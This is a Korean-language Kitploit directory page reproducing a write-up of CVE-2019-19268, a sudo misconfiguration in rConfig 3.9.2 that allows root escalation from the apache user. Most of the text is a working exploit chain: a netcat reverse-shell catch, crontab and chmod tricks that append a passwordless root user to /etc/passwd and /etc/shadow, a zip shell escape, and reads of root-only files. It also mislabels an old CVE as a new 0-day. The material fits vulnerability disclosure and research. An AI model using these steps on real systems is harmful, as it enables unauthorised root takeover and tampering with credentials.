Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-19268 — 새로 발견된 0-day! | Kitploit
도구/GitHubGitHub/thecybergeek/cve-2019-19268
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlMisconfiguration
GitHubthecybergeek/cve-2019-19268

CVE-2019-19268

새로 발견된 0-day!

저장소 보기
34326년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-19268

영향받는 버전: rConfig 3.9.2.

[설명]
rConfig v3.9.2의 잘못된 구성으로 인한 여러 공격 벡터로, 로컬 사용자가 sudo를 통해 루트 명령을 실행할 수 있습니다.

[발견자]
dmw0ng - Discord: dmw0ng#4449
TheCyberGeek - Discord: TheCyberGeek#1892
이메일: [email protected]

rConfig 3.9.2의 Sudo 구성은 apache 사용자에게 /usr/bin/zip, /bin/chmod 및 /usr/bin/tail 프로그램을 root로 실행할 수 있는 권한을 부여합니다. 이는 CVE-2019-16662 및 CVE-2019-16663과 함께 원격 코드 실행에 사용될 수 있습니다.

이는 사용자의 잘못된 구성으로 인해 시스템이 손상되는 일련의 취약점입니다.

[취약점 유형]
안전하지 않은 권한

운영체제: CentOS 7.7.1908 소프트웨어: rConfig v3.9.2

rConfig v3.9.2의 잘못된 구성으로 인한 여러 공격 벡터로, 로컬 사용자가 sudo를 통해 루트 명령을 실행할 수 있습니다.

Askar의 익스플로잇을 사용하여:
https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ 우리는 rConfig 3.9.2에서 apache 사용자를 획득합니다.

액세스

root@kitploit:~
root@TheCyberGeek:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.230.22: inverse host lookup failed: Unknown host
connect to [10.10.11.3] from (UNKNOWN) [192.168.230.22] 60598
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache)

루트 권한 획득 다중 공격 벡터:

apache 사용자는 잘못 구성된 시스템에서 다음 명령을 실행할 수 있습니다:
(ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm

sudo /usr/bin/crontab:

root@kitploit:~
id
uid=48 gid=48(apache) groups=48(apache)
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l
* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow
* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd
su pwned
id
uid=0(root) gid=0(root) groups=0(root)

sudo /usr/bin/zip:

root@kitploit:~
id
uid=48 gid=48(apache) groups=48(apache)
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 65%)
sudo rm $TF
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /bin/chmod

root@kitploit:~
sudo /bin/chmod 777 /etc/shadow
sudo /bin/chmod 777 /etc/passwd
echo "pwned:::0:99999:7:::" >> /etc/shadow
echo "pwned:x:0:0:root:/root:/bin/bash" >> /etc/passwd
su pwned
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /usr/bin/tail 파일 읽기

root@kitploit:~
id
uid=48(apache) gid=48(apache) groups=48(apache)
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt

LFILE=/root/secret.txt
sudo tail -c1G "$LFILE"
I got the secret

sudo /bin/chown 파일 권한 변경

root@kitploit:~
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
sudo /bin/chown apache:apache /root/secret.txt
ls -la /root/secret.txt
-rwx------ 1 apache apache 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt
I got the secret

결과적으로 우리는 rConfig가 설치된 모든 CentOS 7.7.1908을 완전히 손상시킵니다.

도구 다운로드